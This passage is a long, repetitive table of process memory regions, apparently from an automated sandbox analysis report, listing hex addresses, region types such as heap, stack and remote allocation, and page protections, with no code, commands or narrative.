trusted library allocation
|
page read and write
|
||
|
543000
|
heap
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
1C0000
|
heap
|
page read and write
|
||
|
4D02000
|
heap
|
page read and write
|
||
|
4FD2000
|
heap
|
page read and write
|
||
|
1DD000
|
heap
|
page read and write
|
||
|
DE000
|
heap
|
page read and write
|
||
|
4F33000
|
heap
|
page read and write
|
||
|
7FE89BB0000
|
trusted library allocation
|
page read and write
|
||
|
7FE898E3000
|
trusted library allocation
|
page read and write
|
||
|
504000
|
heap
|
page read and write
|
||
|
7FE898E3000
|
trusted library allocation
|
page read and write
|
||
|
1A31D000
|
stack
|
page read and write
|
||
|
149000
|
heap
|
page read and write
|
||
|
16E000
|
heap
|
page read and write
|
||
|
1C3D0000
|
heap
|
page read and write
|
||
|
356F000
|
stack
|
page read and write
|
||
|
452000
|
heap
|
page read and write
|
||
|
4FBE000
|
heap
|
page read and write
|
||
|
7FE89B40000
|
trusted library allocation
|
page read and write
|
||
|
5209000
|
heap
|
page read and write
|
||
|
437000
|
heap
|
page read and write
|
||
|
392000
|
heap
|
page read and write
|
||
|
7FE89A87000
|
trusted library allocation
|
page read and write
|
||
|
250000
|
heap
|
page read and write
|
||
|
3C3D000
|
heap
|
page read and write
|
||
|
3F8000
|
heap
|
page read and write
|
||
|
7FE89C30000
|
trusted library allocation
|
page read and write
|
||
|
1A7D9000
|
stack
|
page read and write
|
||
|
5570000
|
trusted library allocation
|
page read and write
|
||
|
7FE898E3000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FE8998C000
|
trusted library allocation
|
page execute and read and write
|
||
|
3760000
|
trusted library allocation
|
page read and write
|
||
|
3BC6000
|
heap
|
page read and write
|
||
|
4838000
|
trusted library allocation
|
page read and write
|
||
|
3598000
|
trusted library allocation
|
page read and write
|
||
|
19E000
|
heap
|
page read and write
|
||
|
4F7E000
|
heap
|
page read and write
|
||
|
1019000
|
trusted library allocation
|
page read and write
|
||
|
362000
|
heap
|
page read and write
|
||
|
4862000
|
heap
|
page read and write
|
||
|
387000
|
heap
|
page read and write
|
||
|
7FE89B40000
|
trusted library allocation
|
page read and write
|
||
|
4F9B000
|
heap
|
page read and write
|
||
|
4CD7000
|
heap
|
page read and write
|
||
|
1F80000
|
direct allocation
|
page read and write
|
||
|
25F0000
|
trusted library allocation
|
page execute read
|
||
|
5B8000
|
heap
|
page read and write
|
||
|
4FC8000
|
heap
|
page read and write
|
||
|
4A68000
|
heap
|
page read and write
|
||
|
4AAD000
|
heap
|
page read and write
|
||
|
7FE89C10000
|
trusted library allocation
|
page read and write
|
||
|
448000
|
heap
|
page read and write
|
||
|
4A6E000
|
heap
|
page read and write
|
||
|
287C000
|
trusted library allocation
|
page read and write
|
||
|
4F84000
|
heap
|
page read and write
|
||
|
CFD000
|
heap
|
page read and write
|
||
|
359000
|
heap
|
page read and write
|
||
|
1B0000
|
heap
|
page read and write
|
||
|
357D000
|
trusted library allocation
|
page read and write
|
||
|
315B000
|
stack
|
page read and write
|
||
|
4F99000
|
heap
|
page read and write
|
||
|
4F75000
|
heap
|
page read and write
|
||
|
2985000
|
trusted library allocation
|
page read and write
|
||
|
4B46000
|
heap
|
page read and write
|
||
|
5379000
|
heap
|
page read and write
|
||
|
4CFA000
|
heap
|
page read and write
|
||
|
4FD2000
|
heap
|
page read and write
|
||
|
4D09000
|
heap
|
page read and write
|
||
|
37D9000
|
heap
|
page read and write
|
||
|
5A0000
|
heap
|
page read and write
|
||
|
4CFA000
|
heap
|
page read and write
|
||
|
522000
|
heap
|
page read and write
|
||
|
4F8D000
|
heap
|
page read and write
|
||
|
3DE000
|
heap
|
page read and write
|
||
|
2322000
|
trusted library allocation
|
page read and write
|
||
|
1A8A8000
|
heap
|
page execute and read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
4CCC000
|
heap
|
page read and write
|
||
|
4D04000
|
heap
|
page read and write
|
||
|
4D02000
|
heap
|
page read and write
|
||
|
4180000
|
heap
|
page read and write
|
||
|
5A0000
|
heap
|
page read and write
|
||
|
3CE000
|
heap
|
page read and write
|
||
|
2940000
|
remote allocation
|
page read and write
|
||
|
2E40000
|
trusted library allocation
|
page read and write
|
||
|
3DE000
|
heap
|
page read and write
|
||
|
365A000
|
trusted library allocation
|
page read and write
|
||
|
3AA0000
|
trusted library allocation
|
page read and write
|
||
|
5370000
|
heap
|
page read and write
|
||
|
4B80000
|
heap
|
page read and write
|
||
|
4FC4000
|
heap
|
page read and write
|
||
|
37A000
|
stack
|
page read and write
|
||
|
3577000
|
trusted library allocation
|
page read and write
|
||
|
1A7E0000
|
heap
|
page read and write
|
||
|
501A000
|
heap
|
page read and write
|
||
|
4960000
|
trusted library allocation
|
page read and write
|
||
|
190000
|
trusted library section
|
page read and write
|
||
|
4F71000
|
heap
|
page read and write
|
||
|
36A0000
|
heap
|
page read and write
|
||
|
3EC000
|
heap
|
page read and write
|
||
|
4D0D000
|
heap
|
page read and write
|
||
|
EEF000
|
stack
|
page read and write
|
||
|
52F0000
|
heap
|
page read and write
|
||
|
2120000
|
heap
|
page execute and read and write
|
||
|
376000
|
heap
|
page read and write
|
||
|
1A21E000
|
heap
|
page read and write
|
||
|
4AAE000
|
heap
|
page read and write
|
||
|
12297000
|
trusted library allocation
|
page read and write
|
||
|
1C07F000
|
stack
|
page read and write
|
||
|
1B50000
|
trusted library allocation
|
page read and write
|
||
|
1B29F000
|
stack
|
page read and write
|
||
|
38B6000
|
heap
|
page read and write
|
||
|
7FE89A72000
|
trusted library allocation
|
page read and write
|
||
|
1C2000
|
stack
|
page read and write
|
||
|
1C02B000
|
heap
|
page read and write
|
||
|
7FE899A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
5A2000
|
heap
|
page read and write
|
||
|
7FE8998C000
|
trusted library allocation
|
page execute and read and write
|
||
|
4D0E000
|
heap
|
page read and write
|
||
|
286000
|
heap
|
page read and write
|
||
|
3599000
|
trusted library allocation
|
page read and write
|
||
|
38C0000
|
heap
|
page read and write
|
||
|
3B50000
|
trusted library allocation
|
page read and write
|
||
|
1A8AA000
|
heap
|
page read and write
|
||
|
1A2F0000
|
heap
|
page read and write
|
||
|
359E000
|
trusted library allocation
|
page read and write
|
||
|
1E70000
|
heap
|
page read and write
|
||
|
3575000
|
trusted library allocation
|
page read and write
|
||
|
2592000
|
trusted library allocation
|
page read and write
|
||
|
5209000
|
heap
|
page read and write
|
||
|
1AB28000
|
stack
|
page read and write
|
||
|
3C2E000
|
heap
|
page read and write
|
||
|
49A000
|
heap
|
page read and write
|
||
|
3CDE000
|
trusted library allocation
|
page read and write
|
||
|
525000
|
heap
|
page read and write
|
||
|
294C000
|
trusted library allocation
|
page read and write
|
||
|
4BA2000
|
heap
|
page read and write
|
||
|
3FF000
|
heap
|
page read and write
|
||
|
2F3000
|
heap
|
page read and write
|
||
|
1B2C4000
|
heap
|
page read and write
|
||
|
3573000
|
trusted library allocation
|
page read and write
|
||
|
1B12F000
|
stack
|
page read and write
|
||
|
35A2000
|
trusted library allocation
|
page read and write
|
||
|
4CCC000
|
heap
|
page read and write
|
||
|
4A1B000
|
heap
|
page read and write
|
||
|
35A0000
|
trusted library allocation
|
page read and write
|
||
|
50E000
|
heap
|
page read and write
|
||
|
300000
|
heap
|
page read and write
|
||
|
4961000
|
heap
|
page read and write
|
||
|
1B76000
|
heap
|
page read and write
|
||
|
47E000
|
heap
|
page read and write
|
||
|
784000
|
heap
|
page read and write
|
||
|
1BBB000
|
heap
|
page read and write
|
||
|
CC000
|
heap
|
page read and write
|
||
|
4BF000
|
heap
|
page read and write
|
||
|
334000
|
heap
|
page read and write
|
||
|
122000
|
heap
|
page read and write
|
||
|
1A81A000
|
stack
|
page read and write
|
||
|
4F87000
|
heap
|
page read and write
|
||
|
480D000
|
heap
|
page read and write
|
||
|
295E000
|
trusted library allocation
|
page read and write
|
||
|
4320000
|
trusted library allocation
|
page read and write
|
||
|
1B94000
|
heap
|
page read and write
|
||
|
4FCB000
|
heap
|
page read and write
|
||
|
35A7000
|
trusted library allocation
|
page read and write
|
||
|
2DC000
|
heap
|
page read and write
|
||
|
1DC0000
|
direct allocation
|
page read and write
|
||
|
3C3F000
|
heap
|
page read and write
|
||
|
7FE89AE0000
|
trusted library allocation
|
page read and write
|
||
|
340000
|
heap
|
page read and write
|
||
|
4F7F000
|
heap
|
page read and write
|
||
|
7FE89990000
|
trusted library allocation
|
page read and write
|
||
|
4BF000
|
heap
|
page read and write
|
||
|
228F000
|
stack
|
page read and write
|
||
|
3AA0000
|
trusted library allocation
|
page read and write
|
||
|
4D0000
|
heap
|
page read and write
|
||
|
49C6000
|
heap
|
page read and write
|
||
|
7FE89A80000
|
trusted library allocation
|
page read and write
|
||
|
210E000
|
stack
|
page read and write | page guard
|
||
|
2C9000
|
heap
|
page read and write
|
||
|
107000
|
heap
|
page read and write
|
||
|
460000
|
heap
|
page read and write
|
||
|
7FE898D4000
|
trusted library allocation
|
page read and write
|
||
|
3575000
|
trusted library allocation
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
1B36E000
|
stack
|
page read and write
|
||
|
1B230000
|
heap
|
page read and write
|
||
|
1EF0000
|
heap
|
page read and write
|
||
|
4F88000
|
heap
|
page read and write
|
||
|
1A89E000
|
heap
|
page read and write
|
||
|
56E000
|
heap
|
page read and write
|
||
|
3C4F000
|
heap
|
page read and write
|
||
|
4D09000
|
heap
|
page read and write
|
||
|
7FE89C30000
|
trusted library allocation
|
page read and write
|
||
|
3653000
|
trusted library allocation
|
page read and write
|
||
|
4F31000
|
heap
|
page read and write
|
||
|
53D000
|
heap
|
page read and write
|
||
|
482E000
|
trusted library allocation
|
page read and write
|
||
|
4F40000
|
heap
|
page read and write
|
||
|
2742000
|
trusted library allocation
|
page read and write
|
||
|
3C39000
|
heap
|
page read and write
|
||
|
4FCB000
|
heap
|
page read and write
|
||
|
1F00000
|
heap
|
page read and write
|
||
|
4B97000
|
heap
|
page read and write
|
||
|
1A7E4000
|
heap
|
page read and write
|
||
|
185000
|
heap
|
page read and write
|
||
|
3C80000
|
heap
|
page read and write
|
||
|
4FC4000
|
heap
|
page read and write
|
||
|
4D02000
|
heap
|
page read and write
|
||
|
399E000
|
stack
|
page read and write
|
||
|
230F000
|
trusted library allocation
|
page read and write
|
||
|
207F000
|
stack
|
page read and write
|
||
|
1B130000
|
heap
|
page read and write
|
||
|
617000
|
heap
|
page read and write
|
||
|
1A1000
|
heap
|
page read and write
|
||
|
3573000
|
trusted library allocation
|
page read and write
|
||
|
2959000
|
trusted library allocation
|
page read and write
|
||
|
1AB000
|
heap
|
page read and write
|
||
|
1AB50000
|
heap
|
page read and write
|
||
|
4F90000
|
heap
|
page read and write
|
||
|
1DFF000
|
stack
|
page read and write
|
||
|
1D20000
|
heap
|
page read and write
|
||
|
7FE89B00000
|
trusted library allocation
|
page read and write
|
||
|
2291000
|
trusted library allocation
|
page read and write
|
||
|
7FE89C20000
|
trusted library allocation
|
page read and write
|
||
|
4CD7000
|
heap
|
page read and write
|
||
|
371000
|
heap
|
page read and write
|
||
|
5170000
|
heap
|
page read and write
|
||
|
40E000
|
heap
|
page read and write
|
||
|
3657000
|
trusted library allocation
|
page read and write
|
||
|
12130000
|
trusted library allocation
|
page read and write
|
||
|
30F000
|
heap
|
page read and write
|
||
|
28FB000
|
heap
|
page read and write
|
||
|
1E20000
|
heap
|
page read and write
|
||
|
4FCB000
|
heap
|
page read and write
|
||
|
358C000
|
stack
|
page read and write
|
||
|
7FE89BB0000
|
trusted library allocation
|
page read and write
|
||
|
4620000
|
trusted library allocation
|
page read and write
|
||
|
4CDA000
|
heap
|
page read and write
|
||
|
4D0D000
|
heap
|
page read and write
|
||
|
1FD3000
|
direct allocation
|
page read and write
|
||
|
4A5C000
|
heap
|
page read and write
|
||
|
4A0000
|
remote allocation
|
page execute and read and write
|
||
|
36E8000
|
heap
|
page read and write
|
||
|
1CD4000
|
heap
|
page read and write
|
||
|
1A1000
|
heap
|
page read and write
|
||
|
2655000
|
heap
|
page read and write
|
||
|
4830000
|
trusted library allocation
|
page read and write
|
||
|
1B42C000
|
stack
|
page read and write
|
||
|
36D6000
|
heap
|
page read and write
|
||
|
4FC4000
|
heap
|
page read and write
|
||
|
3590000
|
trusted library allocation
|
page read and write
|
||
|
1E00000
|
direct allocation
|
page read and write
|
||
|
295B000
|
trusted library allocation
|
page read and write
|
||
|
390000
|
heap
|
page read and write
|
||
|
29D0000
|
trusted library allocation
|
page execute
|
||
|
1AC5A000
|
stack
|
page read and write
|
||
|
1B5F0000
|
heap
|
page read and write
|
||
|
2D0000
|
trusted library allocation
|
page read and write
|
||
|
3BF000
|
heap
|
page read and write
|
||
|
3845000
|
heap
|
page read and write
|
||
|
4B96000
|
heap
|
page read and write
|
||
|
27AE000
|
trusted library allocation
|
page read and write
|
||
|
1B40000
|
heap
|
page read and write
|
||
|
21A0000
|
heap
|
page read and write
|
||
|
7FE89B80000
|
trusted library allocation
|
page read and write
|
||
|
3F8000
|
stack
|
page read and write
|
||
|
1CE0000
|
heap
|
page read and write
|
||
|
95D000
|
heap
|
page read and write
|
||
|
4E30000
|
heap
|
page read and write
|
||
|
12291000
|
trusted library allocation
|
page read and write
|
||
|
4F99000
|
heap
|
page read and write
|
||
|
22BB000
|
trusted library allocation
|
page read and write
|
||
|
4F99000
|
heap
|
page read and write
|
||
|
47CC000
|
heap
|
page read and write
|
||
|
2E0000
|
trusted library allocation
|
page read and write
|
||
|
2650000
|
heap
|
page read and write
|
||
|
1C130000
|
heap
|
page read and write
|
||
|
38C0000
|
trusted library allocation
|
page read and write
|
||
|
473000
|
direct allocation
|
page read and write
|
||
|
1A754000
|
heap
|
page execute and read and write
|
||
|
3A80000
|
trusted library allocation
|
page read and write
|
||
|
4E2A000
|
heap
|
page read and write
|
||
|
7FE89AC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B58B000
|
heap
|
page read and write
|
||
|
1F6000
|
heap
|
page read and write
|
||
|
7FE89A00000
|
trusted library allocation
|
page execute and read and write
|
||
|
2310000
|
heap
|
page execute and read and write
|
||
|
467000
|
heap
|
page read and write
|
||
|
309000
|
heap
|
page read and write
|
||
|
1C2000
|
heap
|
page read and write
|
||
|
7FE89AD8000
|
trusted library allocation
|
page read and write
|
||
|
2779000
|
trusted library allocation
|
page read and write
|
||
|
4F38000
|
heap
|
page read and write
|
||
|
7FE89986000
|
trusted library allocation
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
4CD5000
|
heap
|
page read and write
|
||
|
1C1AB000
|
heap
|
page read and write
|
||
|
4F8F000
|
heap
|
page read and write
|
||
|
206000
|
heap
|
page read and write
|
||
|
2280000
|
trusted library allocation
|
page read and write
|
||
|
3CE9000
|
trusted library allocation
|
page read and write
|
||
|
4F88000
|
heap
|
page read and write
|
||
|
332000
|
heap
|
page read and write
|
||
|
25D2000
|
trusted library allocation
|
page read and write
|
||
|
4F01000
|
heap
|
page read and write
|
||
|
21D000
|
heap
|
page read and write
|
||
|
4F01000
|
heap
|
page read and write
|
||
|
4C50000
|
heap
|
page read and write
|
||
|
4F9D000
|
heap
|
page read and write
|
||
|
3450000
|
remote allocation
|
page read and write
|
||
|
4F8D000
|
heap
|
page read and write
|
||
|
7FE89AD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
59D000
|
heap
|
page read and write
|
||
|
2EF000
|
trusted library allocation
|
page read and write
|
||
|
3CE000
|
stack
|
page read and write
|
||
|
4BCA000
|
heap
|
page read and write
|
||
|
1A81F000
|
heap
|
page read and write
|
||
|
24B000
|
stack
|
page read and write
|
||
|
3C50000
|
trusted library allocation
|
page read and write
|
||
|
5595000
|
heap
|
page read and write
|
||
|
1FA000
|
heap
|
page read and write
|
||
|
2AFF000
|
stack
|
page read and write
|
||
|
1AB94000
|
heap
|
page read and write
|
||
|
1C2000
|
heap
|
page read and write
|
||
|
1AA3E000
|
stack
|
page read and write
|
||
|
3B50000
|
heap
|
page read and write
|
||
|
2282000
|
trusted library allocation
|
page read and write
|
||
|
4A0B000
|
heap
|
page read and write
|
||
|
60E000
|
heap
|
page read and write
|
||
|
39C000
|
heap
|
page read and write
|
||
|
1ABB6000
|
heap
|
page read and write
|
||
|
48C000
|
heap
|
page read and write
|
||
|
7FE89A9C000
|
trusted library allocation
|
page read and write
|
||
|
1A25C000
|
heap
|
page read and write
|
||
|
1B170000
|
heap
|
page read and write
|
||
|
D3000
|
heap
|
page read and write
|
||
|
4B82000
|
heap
|
page read and write
|
||
|
4A68000
|
heap
|
page read and write
|
||
|
1EB0000
|
heap
|
page read and write
|
||
|
35AC000
|
trusted library allocation
|
page read and write
|
||
|
22CA000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B61000
|
trusted library allocation
|
page read and write
|
||
|
3BAF000
|
heap
|
page read and write
|
||
|
4B87000
|
heap
|
page read and write
|
||
|
294000
|
heap
|
page read and write
|
||
|
5080000
|
heap
|
page read and write
|
||
|
4960000
|
heap
|
page read and write
|
||
|
250E000
|
trusted library allocation
|
page read and write
|
||
|
2F3000
|
heap
|
page read and write
|
||
|
1F20000
|
direct allocation
|
page read and write
|
||
|
4FC6000
|
heap
|
page read and write
|
||
|
1C84000
|
heap
|
page read and write
|
||
|
193000
|
direct allocation
|
page read and write
|
||
|
4810000
|
trusted library allocation
|
page read and write
|
||
|
35AA000
|
trusted library allocation
|
page read and write
|
||
|
27CF000
|
stack
|
page read and write
|
||
|
4B96000
|
heap
|
page read and write
|
||
|
3CEF000
|
trusted library allocation
|
page read and write
|
||
|
1F40000
|
direct allocation
|
page read and write
|
||
|
1C3BF000
|
stack
|
page read and write
|
||
|
5100000
|
trusted library allocation
|
page read and write
|
||
|
4D3000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
431000
|
heap
|
page read and write
|
||
|
1D0000
|
heap
|
page read and write
|
||
|
4F99000
|
heap
|
page read and write
|
||
|
1D50000
|
direct allocation
|
page read and write
|
||
|
1E47000
|
direct allocation
|
page read and write
|
||
|
555000
|
heap
|
page read and write
|
||
|
1A1D8000
|
heap
|
page execute and read and write
|
||
|
3E7000
|
heap
|
page read and write
|
||
|
104000
|
heap
|
page read and write
|
||
|
51F2000
|
heap
|
page read and write
|
||
|
2081000
|
trusted library allocation
|
page read and write
|
||
|
7FE89AC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FE89BA0000
|
trusted library allocation
|
page read and write
|
||
|
293F000
|
stack
|
page read and write
|
||
|
4CC9000
|
heap
|
page read and write
|
||
|
1B9000
|
heap
|
page read and write
|
||
|
4CD7000
|
heap
|
page read and write
|
||
|
39C000
|
heap
|
page read and write
|
||
|
330000
|
heap
|
page read and write
|
||
|
1BD6000
|
heap
|
page read and write
|
||
|
7FE898F3000
|
trusted library allocation
|
page read and write
|
||
|
3BD0000
|
heap
|
page read and write
|
||
|
4B87000
|
heap
|
page read and write
|
||
|
4959000
|
heap
|
page read and write
|
||
|
4C57000
|
heap
|
page read and write
|
||
|
1C439000
|
heap
|
page read and write
|
||
|
40E0000
|
trusted library allocation
|
page read and write
|
||
|
2C0000
|
heap
|
page read and write
|
||
|
36D7000
|
heap
|
page read and write
|
||
|
3BD0000
|
heap
|
page read and write
|
||
|
3AB0000
|
heap
|
page read and write
|
||
|
1A220000
|
heap
|
page read and write
|
||
|
1A1D5000
|
heap
|
page read and write
|
||
|
389000
|
heap
|
page read and write
|
||
|
4FCE000
|
heap
|
page read and write
|
||
|
1C92F000
|
stack
|
page read and write
|
||
|
2F7C000
|
trusted library allocation
|
page read and write
|
||
|
4FC4000
|
heap
|
page read and write
|
||
|
4D3000
|
heap
|
page read and write
|
||
|
310000
|
heap
|
page read and write
|
||
|
127A000
|
unkown
|
page readonly
|
||
|
1A20E000
|
heap
|
page execute and read and write
|
||
|
3BAE000
|
trusted library allocation
|
page read and write
|
||
|
500000
|
heap
|
page read and write
|
||
|
3582000
|
trusted library allocation
|
page read and write
|
||
|
4E32000
|
heap
|
page read and write
|
||
|
484E000
|
trusted library allocation
|
page read and write
|
||
|
3BF000
|
heap
|
page read and write
|
||
|
4B88000
|
heap
|
page read and write
|
||
|
1A8DE000
|
heap
|
page execute and read and write
|
||
|
46E000
|
heap
|
page read and write
|
||
|
37E0000
|
heap
|
page read and write
|
||
|
4F33000
|
heap
|
page read and write
|
||
|
3653000
|
trusted library allocation
|
page read and write
|
||
|
3867000
|
heap
|
page read and write
|
||
|
3C26000
|
heap
|
page read and write
|
||
|
538000
|
heap
|
page read and write
|
||
|
4FC4000
|
heap
|
page read and write
|
||
|
3B5D000
|
heap
|
page read and write
|
||
|
100000
|
heap
|
page read and write
|
||
|
1F60000
|
direct allocation
|
page read and write
|
||
|
7FE89B30000
|
trusted library allocation
|
page read and write
|
||
|
4CD7000
|
heap
|
page read and write
|
||
|
315000
|
heap
|
page read and write
|
||
|
4B01000
|
heap
|
page read and write
|
||
|
1AF000
|
direct allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
365B000
|
trusted library allocation
|
page read and write
|
||
|
4765000
|
heap
|
page read and write
|
||
|
3C4A000
|
heap
|
page read and write
|
||
|
4F9A000
|
heap
|
page read and write
|
||
|
12121000
|
trusted library allocation
|
page read and write
|
||
|
4CD7000
|
heap
|
page read and write
|
||
|
35AD000
|
trusted library allocation
|
page read and write
|
||
|
F00000
|
trusted library allocation
|
page read and write
|
||
|
3D9000
|
heap
|
page read and write
|
||
|
1B550000
|
heap
|
page read and write
|
||
|
37DD000
|
heap
|
page read and write
|
||
|
37B000
|
heap
|
page read and write
|
||
|
7FE898EB000
|
trusted library allocation
|
page read and write
|
||
|
3B6F000
|
heap
|
page read and write
|
||
|
7FE89AC2000
|
trusted library allocation
|
page read and write
|
||
|
CE0000
|
heap
|
page read and write
|
||
|
4A6D000
|
heap
|
page read and write
|
||
|
3C25000
|
heap
|
page read and write
|
||
|
4F84000
|
heap
|
page read and write
|
||
|
3800000
|
heap
|
page read and write
|
||
|
4CDA000
|
heap
|
page read and write
|
||
|
13B000
|
heap
|
page read and write
|
||
|
4FBE000
|
heap
|
page read and write
|
||
|
199000
|
heap
|
page read and write
|
||
|
51B0000
|
heap
|
page read and write
|
||
|
7FE89BD0000
|
trusted library allocation
|
page read and write
|
||
|
36EC000
|
heap
|
page read and write
|
||
|
3C24000
|
heap
|
page read and write
|
||
|
1A1000
|
heap
|
page read and write
|
||
|
1C80000
|
heap
|
page read and write
|
||
|
37C0000
|
heap
|
page read and write
|
||
|
35A1000
|
trusted library allocation
|
page read and write
|
||
|
1FA000
|
heap
|
page read and write
|
||
|
7FE89B10000
|
trusted library allocation
|
page read and write
|
||
|
4D21000
|
heap
|
page read and write
|
||
|
2BD0000
|
heap
|
page read and write
|
||
|
5209000
|
heap
|
page read and write
|
||
|
3CDA000
|
stack
|
page read and write
|
||
|
500000
|
heap
|
page read and write
|
||
|
42EF000
|
stack
|
page read and write
|
||
|
2FCC000
|
stack
|
page read and write
|
||
|
1DB000
|
heap
|
page read and write
|
||
|
1EA000
|
heap
|
page read and write
|
||
|
3E6000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
288000
|
heap
|
page read and write
|
||
|
51EE000
|
heap
|
page read and write
|
||
|
3C4F000
|
heap
|
page read and write
|
||
|
4F9B000
|
heap
|
page read and write
|
||
|
7FE898D4000
|
trusted library allocation
|
page read and write
|
||
|
1C1C6000
|
heap
|
page read and write
|
||
|
1C3DA000
|
heap
|
page read and write
|
||
|
1A1A8000
|
heap
|
page read and write
|
||
|
7FE898EB000
|
trusted library allocation
|
page read and write
|
||
|
12151000
|
trusted library allocation
|
page read and write
|
||
|
7FE89990000
|
trusted library allocation
|
page execute and read and write
|
||
|
1DB000
|
heap
|
page read and write
|
||
|
3818000
|
heap
|
page read and write
|
||
|
28B000
|
heap
|
page read and write
|
||
|
4905000
|
heap
|
page read and write
|
||
|
47CC000
|
heap
|
page read and write
|
||
|
1CA70000
|
heap
|
page read and write
|
||
|
1C12E000
|
stack
|
page read and write
|
||
|
2E4000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
4C50000
|
heap
|
page read and write
|
||
|
2CF000
|
heap
|
page read and write
|
||
|
210F000
|
stack
|
page read and write
|
||
|
4F75000
|
heap
|
page read and write
|
||
|
3BD0000
|
heap
|
page read and write
|
||
|
38D000
|
heap
|
page read and write
|
||
|
7FE89C40000
|
trusted library allocation
|
page read and write
|
||
|
1EF000
|
trusted library allocation
|
page read and write
|
||
|
369F000
|
stack
|
page read and write
|
||
|
2E7000
|
heap
|
page read and write
|
||
|
4F7E000
|
heap
|
page read and write
|
||
|
1270000
|
unkown
|
page readonly
|
||
|
8FE000
|
stack
|
page read and write
|
||
|
52F0000
|
heap
|
page read and write
|
||
|
520A000
|
heap
|
page read and write
|
||
|
5EF000
|
heap
|
page read and write
|
||
|
5E4000
|
heap
|
page read and write
|
||
|
4979000
|
trusted library allocation
|
page read and write
|
||
|
3C2B000
|
heap
|
page read and write
|
||
|
4F8F000
|
heap
|
page read and write
|
||
|
4FC9000
|
heap
|
page read and write
|
||
|
2F3000
|
heap
|
page read and write
|
||
|
37E0000
|
heap
|
page read and write
|
||
|
5A0000
|
heap
|
page read and write
|
||
|
36D8000
|
heap
|
page read and write
|
||
|
1A1D0000
|
heap
|
page execute and read and write
|
||
|
4F31000
|
heap
|
page read and write
|
||
|
13E000
|
heap
|
page read and write
|
||
|
3C1E000
|
heap
|
page read and write
|
||
|
3920000
|
heap
|
page read and write
|
||
|
4FC9000
|
heap
|
page read and write
|
||
|
1C427000
|
heap
|
page read and write
|
||
|
4CCC000
|
heap
|
page read and write
|
||
|
4FC9000
|
heap
|
page read and write
|
||
|
7FE89A91000
|
trusted library allocation
|
page execute and read and write
|
||
|
3B5D000
|
heap
|
page read and write
|
||
|
43E0000
|
trusted library allocation
|
page read and write
|
||
|
454000
|
heap
|
page read and write
|
||
|
3C4F000
|
heap
|
page read and write
|
||
|
4D02000
|
heap
|
page read and write
|
||
|
3BEE000
|
heap
|
page read and write
|
||
|
7FE89B6D000
|
trusted library allocation
|
page read and write
|
||
|
7FE89AD0000
|
trusted library allocation
|
page read and write
|
||
|
4D8000
|
heap
|
page read and write
|
||
|
197000
|
direct allocation
|
page read and write
|
||
|
4CC9000
|
heap
|
page read and write
|
||
|
122C1000
|
trusted library allocation
|
page read and write
|
||
|
1C17A000
|
heap
|
page read and write
|
||
|
26B4000
|
trusted library allocation
|
page read and write
|
||
|
3AD0000
|
heap
|
page read and write
|
||
|
22B6000
|
trusted library allocation
|
page read and write
|
||
|
1C2FC000
|
stack
|
page read and write
|
||
|
5209000
|
heap
|
page read and write
|
||
|
3864000
|
heap
|
page read and write
|
||
|
4D09000
|
heap
|
page read and write
|
||
|
7FE899B6000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FE89A82000
|
trusted library allocation
|
page read and write
|
||
|
3AA0000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B10000
|
trusted library allocation
|
page read and write
|
||
|
213000
|
trusted library allocation
|
page read and write
|
||
|
1C16000
|
heap
|
page read and write
|
||
|
14C000
|
stack
|
page read and write
|
||
|
130000
|
trusted library allocation
|
page read and write
|
||
|
37F000
|
trusted library allocation
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
3900000
|
trusted library allocation
|
page execute
|
||
|
1BF1B000
|
heap
|
page read and write
|
||
|
4E2A000
|
heap
|
page read and write
|
||
|
4A68000
|
heap
|
page read and write
|
||
|
37CC000
|
heap
|
page read and write
|
||
|
160000
|
heap
|
page read and write
|
||
|
3700000
|
trusted library allocation
|
page read and write
|
||
|
51EE000
|
heap
|
page read and write
|
||
|
3804000
|
heap
|
page read and write
|
||
|
1B180000
|
heap
|
page read and write
|
||
|
7FE89B90000
|
trusted library allocation
|
page read and write
|
||
|
168000
|
heap
|
page read and write
|
||
|
3850000
|
heap
|
page read and write
|
||
|
4E32000
|
heap
|
page read and write
|
||
|
7FE89AB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4F8F000
|
heap
|
page read and write
|
||
|
4F8F000
|
heap
|
page read and write
|
||
|
7FE899B6000
|
trusted library allocation
|
page execute and read and write
|
||
|
4970000
|
trusted library allocation
|
page read and write
|
||
|
4D0D000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
4FD2000
|
heap
|
page read and write
|
||
|
1CE7000
|
heap
|
page read and write
|
||
|
1C6000
|
heap
|
page read and write
|
||
|
4E2A000
|
heap
|
page read and write
|
||
|
917000
|
heap
|
page read and write
|
||
|
1A6000
|
heap
|
page read and write
|
||
|
5190000
|
heap
|
page read and write
|
||
|
AE000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
274A000
|
trusted library allocation
|
page read and write
|
||
|
37E0000
|
heap
|
page read and write
|
||
|
179000
|
heap
|
page read and write
|
||
|
5A3000
|
heap
|
page read and write
|
||
|
70000
|
heap
|
page read and write
|
||
|
7FE89B60000
|
trusted library allocation
|
page read and write
|
||
|
38D000
|
heap
|
page read and write
|
||
|
38F000
|
heap
|
page read and write
|
||
|
1A99F000
|
stack
|
page read and write
|
||
|
373000
|
heap
|
page read and write
|
||
|
4FD2000
|
heap
|
page read and write
|
||
|
3F6000
|
heap
|
page read and write
|
||
|
1AB5F000
|
heap
|
page read and write
|
||
|
4F7E000
|
heap
|
page read and write
|
||
|
1B0000
|
trusted library allocation
|
page read and write
|
||
|
7FE89AE8000
|
trusted library allocation
|
page read and write
|
||
|
3990000
|
trusted library allocation
|
page read and write
|
||
|
522000
|
heap
|
page read and write
|
||
|
3ED000
|
heap
|
